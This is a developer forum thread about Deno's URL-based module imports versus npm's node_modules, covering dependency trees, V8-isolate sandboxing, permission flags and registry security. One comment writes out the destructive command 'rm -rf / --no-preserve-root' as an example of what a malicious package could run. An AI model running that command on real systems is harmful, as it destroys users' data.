The right size and version policy for libraries is a non-trivial question. I think the npm culture has settled on the wrong answer to that question, and that's why we end up with these complicated dependency trees.

You only think it needs to be this cohesive thing with types and global definitions and conventions because that’s the current way to approach software development. There is more than one way to do it.

In your code, a library is a completely ephemeral concept; it is only made concrete by the fact that you have a reference to it in your package manager's file. In your code, however, that library is defined by the functions you import and use. So what stops you stripping the rest away? And if stripping is fine, what's wrong with turning that upside down and just not having a concrete library as a unit of distribution? That set of functions can be built out of a single repository and share a component in some unique reference scheme, but any subset of it is no less functional: each function still has a spec of what other functions it needs to do its job, and those requirements are satisfied by your build system and everybody is happy.

As for types, in the vast majority of circumstances you don't need anything beyond what's described in the EDN spec, which is basically JSON but more sensible. And if you do need more types, you just require functions that produce and manipulate them, and you refer to those types using that same unique reference scheme to describe your function signatures.

Removing unused code is a long solved problem. For example, when you compile and link a C program that uses a library, you can make the executable contain only the functions that you used, not the whole library. Similar tools exist for JS.

Exposed data isn't the only way functions interoperate. For example, a database library can give you an opaque connection object which you can pass to other code in the library. Sometimes that object will have parts that are visible to other code in the library, but not to you. Similarly, a UI library can give you UI objects that play nicely with other code in the library, and so on.

> For example, a database library can give you an opaque connection object which you can pass to other code in the library. Sometimes that object will have parts that are visible to other code in the library, but not to you. Similarly, a UI library can give you UI objects that play nicely with other code in the library, and so on.

Right, and all those objects are consumed by functions of that "library", so you just refer to those functions in your import statements and have the build system take care of fetching them for you. No reason to download every single artifact the library provides to achieve that.

Why bother with stripping if you can not bloat your app in the first place?

It's a non-problem. For example, three.js (a library that covers all your 3D rendering needs) is 600kb minified. You download it once and drop it in your project. Update it every month if you want, or keep using the same version, it won't break. Doesn't have any transitive dependencies either. If you don't need all its functionality, tree-shake your project at build time. A small set of such libraries can cover everything your project needs. The whole affair is trivial.

Though if you come from a "many small dependencies" culture, things look different. You'll try to cobble the same functionality from twenty libraries, each of which uses twenty others, and not the same versions. Soon you're asking for optimization - how to make download size smaller? How to build a whiz system for versioning and dependency resolution? Maybe some clever hashing and caching will help? But if you'd used a small set of comprehensive libraries from the start, none of that would be needed.

As i said from the very beginning - there is more than one way to do it. I'm not trying to convince you. Do whatever you're comfortable with.

Sounds like you want Unison: https://www.unisonweb.org/docs/tour/

I was just racking my memory and searching through my library of interesting links to find exactly this! Paul Chiusano gave a nice introductory talk at strangeloop last year: https://www.youtube.com/watch?v=gCWtkvDQ2ZI

Interesting, yeah that sounds like what I was thinking about. Thanks for the link.

Rich Hickey's talk about this is enlightening https://www.youtube.com/watch?v=oyLBGkS5ICk

You still need to keep track of things that are mutually incompatible.

Not really, because you ship every required version of every function. Functions aren’t incompatible with functions they don’t use.

The node_modules folder, with its tens of thousands of files, is killing my SSD!

It is present in every node project I have, and consumes a gigantic number of IO operations.

Thus I’m very glad that deno didn’t continue this tradition.

Replace ‘node_modules’ with ‘deno cache’ and presto! you’re in the future.

Yarn already removes the need for node_modules without requiring a change of interpreter and APIs, though.

Not true

deno cache contains only the JS files, and each one of them includes all its dependencies in the same file.

OTOH, node_modules contains every package in the dependency tree, and each package has many files not related to the required JS file.

You might as well live without a GUI, as those involve a "gigantic" amount of IO as well.

Why are people being so sensitive with hardware resource? Like how Electron is killing your machine...

An SSD has a limited number of write operations, while node_modules writes many, many files to the disk.

And as mentioned in the article you repeatedly remove and recreate it to fix “problems”

Even with write amplification, a node_modules is not typically going to cause more than a few gigabytes of write load. So with max TBW being somewhere in the hundreds of terabytes for current SSDs, we're looking at hundreds of thousands of node_modules rewrites before the drive gives out.

Unless you're rewriting your node_modules every other minute on an old SSD I recommend finding something else to worry about.
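
To make the back-of-envelope math concrete (both figures are illustrative assumptions, not measurements):

```typescript
// Illustrative SSD endurance math — both numbers are assumptions.
const driveEnduranceBytes = 300e12; // 300 TB total-bytes-written rating
const perRebuildBytes = 3e9;        // ~3 GB written per node_modules rebuild
const rebuildsBeforeWearOut = driveEnduranceBytes / perRebuildBytes;
// → 100,000 full rebuilds before hitting the rated endurance
```

Even at ten rebuilds a day, that is decades of use.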

All these "features" of Deno are super cool, but why reimplement a runtime from scratch :(

Can we not benefit in Node from what I essentially see as "package.json not mandatory" - which I think is already achievable with ES Modules - and "better permissions model"?

Maybe this can be seen like the effort from several years ago where the "io.js" project branched out of Node over things the community didn't like. Then after a few years those things were implemented into Node and io.js "died off". Although io.js always had the intent of being compatible with Node, so that definitely changes things.

Some of what Deno does can be done in Node or people are trying to implement it (I've seen some proofs of concept around the way modules are included). However, it seems that being able to write the runtime in Rust has been a big deal here as it dramatically changes how the runtime is distributed and the developer experience of writing extensions for it versus Node.

How is choosing between Rust and C++ as the language in which the thing is written in, an important thing to the users who only care about the JS/TS interface?

Because, in the long run, rust is a much better language for writing this in, and will enable faster addition of features for the JS/TS interface and more certainty that the security level stuff is actually secure.

The npm registry is like a rickety bridge across a chasm. Every day I cross that bridge because of how much time and work it saves me, but I am well aware that the bridge might fall, especially with Microsoft now in charge.

Claiming that I don't need a bridge does not help me. Claiming that Deno is agnostic about bridges is fine. If someone is looking for a startup idea, here is a perfect opportunity to build a better bridge - one that works with Deno.

Seems odd that they don't support an equivalent of the integrity attribute.

For example https://deno.land/x/ is effectively nothing but a URL redirect server, where it rewrites URLs to include a git commit-ish reference in the redirected URL. So https://deno.land/x/oak@v4.0.0/mod.ts becomes https://raw.githubusercontent.com/oakserver/oak/v4.0.0/mod.t..., which GitHub serves up a nice versioned module.

Thus http://deno.land/x/ is the de facto central registry. I've yet to see how it makes a difference whether the logic of resolving a package name to a concrete version of the package is baked into command-line tooling or a web service.
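
The rewrite the service performs is mechanical; roughly this (the registry mapping here is a stand-in for deno.land's real database, and the function is a sketch, not their code):

```typescript
// Sketch of the URL rewrite deno.land/x performs.
// The registry lookup stands in for the real service's module database.
const registry: Record<string, string> = { oak: "oakserver/oak" };

function rewrite(url: string): string | null {
  const m = url.match(/^https:\/\/deno\.land\/x\/([\w-]+)@([^/]+)\/(.+)$/);
  if (!m) return null;
  const [, mod, version, path] = m;
  const repo = registry[mod];
  return repo
    ? `https://raw.githubusercontent.com/${repo}/${version}/${path}`
    : null;
}
```

Which is the point: the "registry" is just a name-to-URL mapping, wherever it lives.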

Feel like it would've been useful to require a manifest.json or some such that spec'd required permissions right next to the deno package on the FS, in the web server web root. This is not different from manifests for Web Extensions. Then anyone could write their own CLI to download and cache packages but have their own "excluded permissions" list that throws/rejects packages that overreach or could potentially overreach.

Now package writers have a feedback metric for getting as granular as possible with the access their package needs. Even better, anyone could build server infrastructure that does the client-side validation bit for package consumers, with its own attendant CLI tool.

It looks to me Deno opens the possibility of multiple NPMs, which is a good thing over the de facto monopoly NPM exerts today.

The issue I have with Deno is not only in comparison to NodeJS. If you might use Deno, it means you are open to switching platform, and even language if you were not doing TS already. And if you are at that point, you might as well choose any platform, for example one that uses a better (more strongly typed) programming language and has a bigger ecosystem (Scala, Swift, Rust, F#, Java, OCaml, Kotlin... at this point I feel nearly any other language fits this description ^^). I have been doing Typescript for a while now; it's probably as good as it could be at what it does (being a JS add-on), but if you don't have that constraint, there are many better options.


Scala can be so different that you can spend years learning it and still not understand a lot of things. Swift is OK, but ARC is a nightmare; good for mobile, though. Rust is really for C++ guys with specific use cases. F# and OCaml are cool languages, but good luck hiring fast if you need to. Kotlin is probably the best, but in fact it only has decent performance on the JVM. Native is still 15x slower than JS.

TS is a first-class language and has a bigger ecosystem than, say, F#, anyway. Etc, etc.

I'd like to add that the ecosystem around TS/JS is huge, even allowing you to do interop with both F# and Ocaml on both frontend and backend code.

I’m going to skip over the other stuff, but

> Native is still 15x slower than JS.

Surely you meant the other way around?


It seems Kotlin Native can be 100x slower than its JVM version. It's still under development, so this can of course change.

Frankly no, we tried to do everything in Kotlin and it was insane how slow it was compared to JS. You literally spend 100ms+ parsing 1 KB of JSON.

Kotlin JS is not fast either, since it is not that optimized for browsers and has runtime checks for all types, so just doing something like a * b + c will yield three typeof invocations.

You can use normal JS with Deno. And most npm modules can work through jspm or pika.dev.

This may be inviting downvotes, but I still don't understand the use-case of Deno. Why would I use this over something like Python?

In Python, I find I can do most things I want with the standard library plus a handful of well-known packages, so even just downloading the tarballs and installing manually isn't all that onerous.

Why do I want a "browser for code"?

I may just be out-of-touch, as a purely backend/machine-learning/quality engineer. Clearly, this is a real need in the front-end / JavaScript space, but coming from the outside I just don't quite understand yet the value proposition here. Can anyone explain?

>Why would I use this over something like Python?

That's more a js vs python question than a Deno question so I don't think you'll find many answers here as we'd veer off-topic.

>I find I can do most things I want with the standard library

A standard library exists for Deno as well. Code from any URL is not an argument against having a standard library. The distinction being made is whether or not package management should be brittle and baked into the programming model to accept only one source of truth vs. any. Any source of truth has the advantage of letting better solutions evolve and reveal themselves over time, which is great for longevity, standards, etc. etc.

> Why do I want a "browser for code"?

My understanding is that this has a lot to do with reproducing how front-end code behaves "in the wild." If you have a full browser, you aren't tricking your programming model into thinking it's being run in a browser. I think this has tooling advantages in the short term (i.e. simplicity) and more subtle ones in the long term.

Thanks. My question really wasn't focused well, and it was easily read not as "please help me understand" but as "hurr durr Python is better".

I think my reaction comes from the dissonance between people saying "Deno is the best thing ever for CLI apps!" then following up with "Here are the ways it's better than Node!", without acknowledging all the other scripting languages out there. But I think I need to read that first line as having an implicit "...in the JS/TS ecosystem", and then it all makes sense.

Since clearly one of Deno's draws is that it improves on the package management of Node, I was wondering why JS projects so often end up with such a long list of dependencies, compared to the Python/Go/C++ projects that I'm more familiar with. That's probably explained just by NPM making it easy, so people did it. (Sort of like how Java grew convoluted DI schemes because OO + GC + reflection made it possible.)

One of these days I should learn more JS than having read through the Good Parts once. :-)

Your question really is "why use server-side JS over Python" and that doesn't have a real answer, just never-ending arguments.

Let's paint it blue!

> Clearly, this is a real need in the front-end / JavaScript space

I think you answered your own question there. If you already know JS/TS and want to dive into server code then this is more approachable than learning a brand new language.

If you have everything you need in Python, then you're not really the target audience. Deno is an answer to the current state of the npm ecosystem. Not that you shouldn't switch to Deno from Python, but you should only do that if you already had a reason to switch to Node from Python.

Can someone explain to me what problem that Deno and Node are trying to solve? Is JavaScript really such an amazing language that we need to use it for backend applications now?

What niche is it filling that is unfilled by other, more sanely designed programming languages?

I'm not trying to be obtuse or anything, I'm just really curious as to why anyone would use Deno (or Node for that matter) for a project when I can think of at least 4 alternatives that are more sane (Go, Python, Rust, Java, and many more out there, just that these are the ones I'm most comfortable with).

This seems like trolling more than a genuine question, but I'll answer in case it is genuine.

It makes it easier for fullstack developers since it's a single language both in the front-end and back-end. You only need to learn once how `JSON.parse()`, `atob`, classes/prototypes, etc. work, and not worry about language inconsistencies making errors.

It is decently efficient (not the best, not the worst), fairly readable (I'd say on the upper side). The three main disadvantages IMHO are:

- Its async nature is more difficult to grasp for beginners compared to one thread/request and then linear-ish work of some other languages

- Node.js standard library is optimizing for flexibility instead of conciseness or completeness, so there's quite a bit of manual gruntwork involved (not the worst of those mentioned though).

- Right now the ecosystem is in a major migration from `require()` to `import`. The last large migration like this was from Callbacks to Promises, and IMHO it went very well.

As someone who is very comfortable with Javascript, and was comfortable with PHP and Python back in the day, I would not trade Node.js for any of those. I am thinking most of the time about what I want to achieve in a coherent way, and not fumbling with pointers.

> - Its async nature is more difficult to grasp for beginners compared to one thread/request and then linear-ish work of some other languages

Grasping isn't the hard part; it's just about placing callback functions on functions that accept callbacks.

What's so bad is that it is async by default, and now you need a million "await" and "async" keywords all over the place. I wish it were sync by default, and for those rare cases where you really want it async, you would add a keyword.
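
The proliferation looks something like this (the helper functions are hypothetical stand-ins for db/API calls):

```typescript
// Every step needs its own await, even trivially fast ones.
// getUser/getOrders are hypothetical stand-ins for real async calls.
const getUser = async (id: number) => ({ id, name: "ada" });
const getOrders = async (userId: number) => [{ userId, total: 42 }];

async function report(id: number): Promise<string> {
  const user = await getUser(id);          // await #1
  const orders = await getOrders(user.id); // await #2
  return `${user.name}: ${orders.length} order(s)`;
}
```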

I mean 4 of the very common Node.js operations are async by nature: database calls, file access, external API calls and crypto.

They aren't async by nature, just time-consuming. Async is a useful way of dealing with time-consuming operations in some situations, but blocking calls also work (and make more sense for some workloads).

Reasons for node:

* Testing/running code that will run on a browser javascript vm outside of the browser

* Developer familiarity

* Reduced context switching

* Reasonably good asynchronous performance given the above

* TypeScript, given the above

* Shared backend/frontend code(SSR, etc etc)

Interestingly I wouldn't really want to reach for any of your alternatives as a general substitute for NodeJS/TypeScript.. C# or F# perhaps.

> Can someone explain to me what problem that Deno and Node are trying to solve?

Deno and Node aren't solving the same exact same set of problems.

> Is JavaScript really such an amazing language that we need to use it for backend applications now?

Yes, for select values of “we”; productivity with programming languages being both subjective and path-dependent. But Node and Deno aren't so much about JS as a developer language as JS as a multi-language runtime, similar to the JVM. Just as one might use Scala, Kotlin, Clojure, Ruby, or other languages on the JVM, there are a large number of languages one can run on a JS engine.

> I'm not trying to be obtuse or anything, I'm just really curious as to why anyone would use Deno (or Node for that matter) for a project when I can think of at least 4 alternatives that are more sane (Go, Python, Rust, Java, and many more out there, just that these are the ones I'm most comfortable with).

Because your subjective idea of sanity isn't universal; and because there are substantial productivity advantages in sharing programming languages between front and back end, especially when you've got the same team doing both.

Node.js has been used in production for over a decade. Some of the most popular applications of the past decade have been built on Node and in 2020, JavaScript is the most popular programming language.

It's now the most popular programming language by a decent margin, there are a lot of libraries available for it, and it lacks some of the performance limitations that affect other dynamic languages. Anyone that does frontend dev knows JavaScript; it's about as close to a universal language as you can get.

Personally, there are about a dozen other things I'd rather use, but from a pragmatic perspective it makes sense. It's easy and it gets the job done relatively quickly.

The V8 engine is developed for Chrome, so you can expect it to remain stable and actively developed for a very long while, and there are plenty of resources online for the language itself.

And there's TypeScript if you think JS isn't "sane".

I still think that sandboxing dependencies is the wrong answer to this problem.

(first - the problem is trusting dependencies. How to spot malicious code in a dependency, and stop an evil upstream maintainer from doing bad things to your site)

This solution slows down the system at run-time (and also never quite solves the problem - sandboxes are pretty leaky. The history of browser extensions trying to do the same thing is a good example).

I'm not really sure what the solution is. I have some ideas, but they're mostly about changing the culture around coding, rather than technical.

Having sandbox restrictions available enables defence in depth. When it comes to running other people's code, VM restrictions provide a solid layer of protection.

At work we're transitioning our NPM scripts to run in containers. This is very cumbersome. But the extra layer protects dev homedirs from rando NPM authors.

Deno is awesome. We had a similar idea at Yazz Pilot and are currently building out the ability to import a subset of Javascript code from a URL. Currently it only supports code of the form:

pilot https://raw.githubusercontent.com/zubairq/pilot/master/start...

Interesting, so by declaring dependencies in the code itself, which is more obtuse than using node modules, we might see fewer overall packages being used by developers, and more implementations from scratch. No more gigabyte-sized node_modules! I'm looking forward to this.

There are many others. I don't know why people aren't looking into std (which provides most of the functionality) or using regex where it doesn't make sense given deno is a browser.

Well hopefully people find it too annoying to use deno modules and we get some sanity in development.

I’m still not sure how this addresses Laurie Voss’s point about left-pad. Does the caching and lock file happen by default?

> The Deno CLI works like a browser, but for code. You import a URL in the code and Deno will go and fetch that code and cache it locally, just like a browser. Also, like a browser, your code runs in a sandbox, which has zero trust of the code you are running, irrespective of the source.
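A toy sketch of that "browser for code" behaviour, just to make the fetch-once-then-cache idea concrete (hypothetical code, not Deno's actual loader):

```typescript
// Hypothetical module cache: fetch a URL the first time it is imported,
// then serve every later import from the local cache, like a browser.
type Fetcher = (url: string) => string;

class ModuleCache {
  private cache = new Map<string, string>();
  fetches = 0; // counts real "network" hits, for illustration

  constructor(private fetch: Fetcher) {}

  import(url: string): string {
    const cached = this.cache.get(url);
    if (cached !== undefined) return cached; // cache hit: no network traffic
    this.fetches++;
    const source = this.fetch(url);
    this.cache.set(url, source);
    return source;
  }
}

// Stub "network" so the sketch is self-contained:
const net: Fetcher = (url) => `// source of ${url}`;
const loader = new ModuleCache(net);

loader.import("https://deno.land/std@0.53.0/fmt/colors.ts");
loader.import("https://deno.land/std@0.53.0/fmt/colors.ts"); // served from cache
```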

Guessing it uses containerization or virtualization, hopefully with no gaps in security.

I don’t know that it uses either of those tools as the built-in approach. It could have changed, but last I read, it used V8’s built-in Isolate concept to provide the sandbox and that when an Isolate is created, it is only provided the underlying system access specified by CLI flags or other options e.g. Filesystem, Network, etc...

According to its architecture description ¹, there are no containers or virtualization involved in Deno.

I found deno::CoreIsolate in the source ². Userland process isolation seems to be provided by V8 Isolates.

The execution and security model reminds me of a recent trend in FaaS, in particular running WebWorkers (or similar), WASM, etc. I found a fascinating presentation about how V8 is used at CloudFlare ³.

"..using V8 isolates instead of containers or VMs, achieving 10x-100x faster cold starts and lower memory footprints.."


¹ https://deno.land/manual/contributing/architecture#schematic...

² https://github.com/denoland/deno/blob/2610ceac20bc644c0b58bd...

³ Fine-Grained Sandboxing with V8 Isolates - https://www.infoq.com/presentations/cloudflare-v8/

V8 is a sandbox by default; it does not expose any I/O functions, not even standard output.

Deno runs JS in V8 and all syscalls go through the Rust runtime. The limitations are pretty coarse (but I'd say a great start).

It's running Javascript, not native code. You virtualize (and containerize, if you believe that's a meaningful security boundary) to handle execution of arbitrary native code --- or of runtimes, like Node.js, that proxy to arbitrary native code. The Deno runtime deliberately doesn't do this.

But couldn't the code you download easily just execute `rm -rf / --no-preserve-root`? The problem isn't executing code from a random URL (which NPM still has); it's that even though there's a sandbox, there are still ways out of it.

Not in Deno. To run that, you’d need to shell out, which Deno won’t let you do without explicitly granted permission at the CLI.

You can in Node, because Node bridges the whole platform standard library by default. Deno does the opposite: you have to opt programs into the platform capabilities you want to give them.
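In real Deno the grants come from CLI flags (`--allow-net`, `--allow-read`, `--allow-run`, etc.). A toy default-deny gate, just to illustrate the opt-in model (not Deno's actual internals):

```typescript
// Sketch of a default-deny capability gate, in the spirit of Deno's
// --allow-* flags. Illustration only, not Deno's real permission code.
type Capability = "read" | "write" | "net" | "run";

class Permissions {
  private granted: Set<Capability>;

  constructor(granted: Capability[] = []) {
    // Default deny: nothing is granted unless explicitly listed.
    this.granted = new Set(granted);
  }

  check(cap: Capability): void {
    if (!this.granted.has(cap)) {
      throw new Error(`PermissionDenied: requires --allow-${cap}`);
    }
  }
}

// With no flags, shelling out ("run") is refused:
const none = new Permissions();
let denied = false;
try {
  none.check("run");
} catch {
  denied = true;
}

// With an explicit grant, only the granted capability passes:
const withNet = new Permissions(["net"]);
withNet.check("net"); // does not throw
```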

Which you will nearly always give permission to do anything useful.

Others have noted Deno has good protections around this, but I would add that it has those because running a package from NPM is in and of itself just executing code from a random URL, and that has caused plenty of problems in the past.

Clear article, I honestly don't have much to add to the main thesis of it, other than that I'm very curious to see how well the arguments will hold up when faced with "real world" usage, and how Deno will evolve.

But if I may indulge in a bit of bike-shedding on the side, does anyone else think that the repeated URLs in the example dependency tree are a bit noisy and hide the deeper structure of the dependencies?

      ├── https://deno.land/std@0.53.0/fmt/colors.ts
      └─┬ https://deno.land/x/oak/mod.ts
        ├─┬ https://deno.land/x/oak/application.ts
        │ ├─┬ https://deno.land/x/oak/context.ts
        │ │ ├── https://deno.land/x/oak/cookies.ts
        │ │ ├─┬ https://deno.land/x/oak/httpError.ts
        │ │ │ └─┬ https://deno.land/x/oak/deps.ts
        │ │ │   ├── https://deno.land/std@0.53.0/hash/sha256.ts
        │ │ │   ├─┬ https://deno.land/std@0.53.0/http/server.ts
        │ │ │   │ ├── https://deno.land/std@0.53.0/encoding/utf8.ts
        │ │ │   │ ├─┬ https://deno.land/std@0.53.0/io/bufio.ts
        │ │ │   │ │ ├─┬ https://deno.land/std@0.53.0/io/util.ts
I'm not entirely sure what would be the ideal alternative presentation though. Perhaps something along the lines of one of these two mock-ups I just edited by hand:

       └─┬ x/oak/examples/server.ts
         ├── std@0.53.0/fmt/colors.ts
         └─┬ x/oak/mod.ts
           ├─┬ x/oak/application.ts
           │ ├─┬ x/oak/context.ts
           │ │ ├── x/oak/cookies.ts
           │ │ ├─┬ x/oak/httpError.ts
           │ │ │ └─┬ x/oak/deps.ts
           │ │ │   ├── std@0.53.0/hash/sha256.ts
           │ │ │   ├─┬ std@0.53.0/http/server.ts
           │ │ │   │ ├── std@0.53.0/encoding/utf8.ts
           │ │ │   │ ├─┬ std@0.53.0/io/bufio.ts
           │ │ │   │ │ ├─┬ std@0.53.0/io/util.ts

       ├── https://deno.land/std@0.53.0/fmt/colors.ts
       └── https://deno.land/x/oak/
             └─┬ mod.ts
               ├─┬ application.ts
               │ ├─┬ context.ts
               │ │ ├── cookies.ts
               │ │ ├─┬ httpError.ts
               │ │ │ └─┬ deps.ts
               │ │ │   ├── https://deno.land/std@0.53.0/
               │ │ │   │     ├── hash/sha256.ts
               │ │ │   │     └─┬ http/server.ts
               │ │ │   │       ├── encoding/utf8.ts
               │ │ │   │       ├─┬ io/bufio.ts
               │ │ │   │       │ ├─┬ io/util.ts
I'm sure there are good arguments to be made against both of these options as well - plus I just came up with this on the spot, I don't even know which "rules" would generate such a tree.

I think this is pretty good. I like the use of URLs as identifiers for your dependencies, just because it’s so unambiguous. I also like re-exporting deps manually.

My only real point of discomfort is how the runtime seems to be a bit too closely tied to the actual download and transport of these files/URLs. Like, importing from https implying all further imports are from https is nice, I guess, but is really stretching the browser metaphor imo.

I guess that is really my main point of contention, I agree with the security model but I don’t agree that websites are particularly analogous to code dependencies.
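The "re-exporting deps manually" convention mentioned above is usually a single deps.ts file that pins versions in one place, so the rest of the codebase never touches raw URLs. A minimal sketch (the std exports shown are from the 0.53.0 modules discussed in the article; adjust to whatever you actually depend on):

```typescript
// deps.ts — the one place that knows about remote URLs and versions.
export { serve } from "https://deno.land/std@0.53.0/http/server.ts";
export { red, bold } from "https://deno.land/std@0.53.0/fmt/colors.ts";

// Everywhere else in the project:
//   import { serve, red } from "./deps.ts";
// Bumping a version then means editing a single file.
```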

The post sounds rather Javascript-specific, or NPM-specific. How well does that apply to other languages? Especially compiled ones?

2 reasons why this could be a faulty approach:

1) Code, specifically library code, which is what npm mostly consists of, in its most ideal state should not have a never-ending variety. On the contrary, we do want to all arrive at one good way of doing a thing. This naturally invites a single central repository over the decentralization of the web.

2) Very few people publish their own websites. Why? It's complicated and costly. This is why Facebook and Twitter fare so well. So even the decentralized web eventually converges on a centralized platform that solves the hosting problem. Why reintroduce the problem when there is already a fairly un-problematic central registry?

If the security model is the real winner, I don't see why it could not be back-ported to Node - it likely will be if Deno takes off in any way.

I don't have an opinion on Deno per se, but I quibble with this part of your point:

> Code, specifically library code, which is what npm mostly consists of, in its most ideal state should not have a never-ending variety. On the contrary, we do want to all arrive at one good way of doing a thing.

This implies that there is in fact one good way to do most things, but in practice different people want different trade-offs and forcing them into a single codebase isn't possible when the options are mutually exclusive. You can't have a library that is simultaneously strict about types (panics if you pass a string instead of a number, say) and forgiving about types (automatically coerces strings to integers or vice versa).
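To make that concrete, here are two hypothetical libraries with mutually exclusive contracts; no single "one good way" implementation can satisfy both callers:

```typescript
// Hypothetical strict library: rejects a string where a number is expected.
function strictDouble(x: unknown): number {
  if (typeof x !== "number") throw new TypeError("expected a number");
  return x * 2;
}

// Hypothetical forgiving library: silently coerces "21" to 21.
function forgivingDouble(x: unknown): number {
  const n = Number(x);
  if (Number.isNaN(n)) throw new TypeError("not coercible to a number");
  return n * 2;
}

let strictRejected = false;
try {
  strictDouble("21"); // the strict contract refuses this call
} catch {
  strictRejected = true;
}
const coerced = forgivingDouble("21"); // the forgiving contract accepts it
```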

Deno seems like the next MongoDB fiasco waiting to happen. Insecure by default. The fact that it doesn't grant permissions by default is irrelevant; servers need permissions to function (access databases, access files, access the network, etc.).

The incentives are all wrong. If I MITM a website, at best I gain access to the data of the few users that pass through my part of the net. If I MITM something Deno is using, I get access to the server. That's orders of magnitude more data I get access to, and therefore the incentive to MITM (or other) is much much MUCH higher.

I agree, they should force cached, sandboxed fetching by default and have people opt in to dynamic fetching.
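For what it's worth, Deno does ship a mitigation along these lines: a `--lock=lock.json` flag that records hashes of fetched sources and refuses to run modules whose content no longer matches. A toy sketch of that integrity check, using a simple FNV-1a hash in place of a real cryptographic digest (hypothetical code, not Deno's implementation):

```typescript
// Toy 32-bit FNV-1a hash, standing in for the real digest a lockfile would use.
function fnv1a(s: string): number {
  let h = 0x811c9dc5;
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

// Hypothetical lockfile: URL -> hash recorded at install time.
const lock: Record<string, number> = {
  "https://example.com/dep.ts": fnv1a("export const x = 1;"),
};

// Refuse any fetched source whose hash no longer matches the lockfile.
function verify(url: string, fetched: string): boolean {
  return lock[url] === fnv1a(fetched);
}

const ok = verify("https://example.com/dep.ts", "export const x = 1;");
const tampered = verify("https://example.com/dep.ts", "export const x = 1; evil();");
```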
